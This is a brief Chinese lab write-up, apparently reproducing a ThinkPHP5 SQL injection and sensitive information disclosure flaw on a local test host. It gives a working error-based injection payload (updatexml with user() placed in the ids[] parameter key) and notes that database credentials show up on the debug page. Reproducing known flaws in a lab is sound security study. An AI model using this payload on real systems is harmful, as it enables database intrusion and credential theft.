ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
基本原理
详细阅读参考资料:
漏洞复现
访问http://192.168.44.132/index.php?ids[]=1&ids[]=2
,会看到显示用户名,说明环境运行成功。
打开页面http://192.168.44.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
,你会发现消息显示成功:
并且可以通过调试页面找到数据库的账号和密码。
这是另一个敏感信息泄露漏洞。